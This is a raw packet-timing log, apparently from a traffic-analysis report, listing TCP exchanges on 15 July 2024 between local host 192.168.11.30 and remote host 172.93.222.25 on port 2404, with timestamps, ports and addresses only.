                                                Jul 15, 2024 09:25:23.434376955 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434389114 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434401035 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434425116 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434437037 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434447050 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434458017 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434468985 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434479952 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434490919 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434499979 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.434505939 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434577942 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.434709072 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.434735060 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434748888 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434761047 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434772015 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434783936 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434794903 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434807062 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434818029 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434829950 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434842110 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434962988 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434978008 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434990883 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.434993029 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.435009003 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435020924 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435033083 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435044050 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435055971 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435067892 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435070038 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.435084105 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435095072 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435106993 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435118914 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435131073 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435177088 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.435189009 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435201883 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435225964 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435237885 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435247898 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435259104 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435262918 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.435275078 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435286045 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435297966 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435307026 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435317993 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435328960 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435337067 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.435468912 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.435553074 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.436095953 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.436110020 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.436243057 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.436243057 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.436435938 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.436451912 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.436463118 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.436474085 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.436485052 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.436496019 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.436506987 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.436518908 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.436611891 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.436686993 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.438569069 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.477313995 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.519476891 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.531548023 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.542360067 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.542385101 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.542432070 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.542634010 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.544646978 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.544807911 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.545388937 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.545556068 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.628735065 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.628771067 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.628783941 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.628796101 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.628838062 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.628850937 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.628963947 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.629029036 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629044056 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629049063 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.629075050 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629105091 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629117012 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629128933 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629139900 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629165888 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629194975 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629204988 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.629210949 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629223108 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629247904 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629260063 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629271030 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629281998 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629292965 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629303932 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629314899 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629326105 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629337072 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629348040 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629359007 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629368067 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.629381895 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.629476070 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.629544020 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.631361008 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631550074 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.631617069 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631630898 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631655931 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631666899 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631678104 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631689072 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631700039 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631730080 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631741047 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631766081 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631778002 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631788015 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.631859064 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.631925106 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.632025957 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.633490086 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633505106 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633728981 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.633763075 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633790970 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633802891 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633814096 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633825064 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633836985 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633847952 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633858919 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633869886 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633881092 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633892059 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.633950949 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.634000063 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.635750055 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.635998964 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.636024952 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636038065 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636049986 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636061907 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636074066 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636085033 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636096954 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636107922 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636127949 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636145115 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636157036 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636169910 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.636199951 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.636430979 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.638174057 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638189077 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638422966 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.638469934 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638484001 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638495922 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638506889 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638518095 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638529062 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638540030 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638550997 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638561964 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638572931 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638583899 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.638839006 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.640326023 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640341043 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640527010 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.640594006 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640619993 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640633106 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640644073 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640654087 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640665054 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640693903 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640706062 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640717030 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640742064 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640753031 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.640767097 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.640868902 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.640892029 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.642580032 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642596006 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642822027 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.642855883 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642883062 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642895937 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642906904 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642918110 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642929077 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642940044 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642951965 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642962933 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642973900 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.642985106 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.643008947 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.643131018 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.736749887 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.737030029 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.737179995 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.737270117 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.738925934 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.739125013 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.739135027 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.739507914 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.739638090 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.739908934 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.739989042 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826019049 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826042891 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826122999 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826136112 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826147079 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826158047 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826270103 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.826316118 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826338053 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826339960 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.826356888 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826369047 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826380968 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826392889 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826404095 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.826469898 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.826627016 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.828432083 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828547955 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828560114 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828571081 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828594923 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.828608990 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828641891 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828664064 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828666925 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.828682899 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828695059 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828706026 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828716993 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828727961 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828737974 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.828758001 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.828948021 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.830785036 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.830888033 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.830900908 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.830913067 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.830924988 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.830951929 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.830965042 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.830976963 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.830988884 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.831001043 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.831012964 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.831026077 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.831037045 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.831098080 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.831182957 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.833422899 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833444118 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833534956 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833662033 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833673954 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833686113 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833688021 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.833714962 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833769083 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833806992 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833834887 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833848000 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833859921 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833870888 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.833959103 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.834038973 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.835342884 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835479975 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835494041 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835597038 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835618019 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835633993 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835647106 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835664988 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835676908 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835689068 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835700989 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835740089 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835751057 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.835766077 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.835830927 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.835961103 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.837755919 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.837857008 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.837871075 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.837882996 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.837918997 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.837944031 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.837970018 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.837975979 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.838104963 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.838133097 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.838154078 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.838157892 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.838171959 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.838182926 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.838193893 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.838205099 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.838224888 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.838350058 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.840786934 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.840863943 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.840913057 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.840925932 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.840938091 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.840949059 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.840981960 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.840992928 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.841005087 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.841044903 CEST498682404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:23.841094017 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.841114044 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.841126919 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.841137886 CEST240449868172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:23.841226101 CEST498682404192.168.11.30172.93.222.25
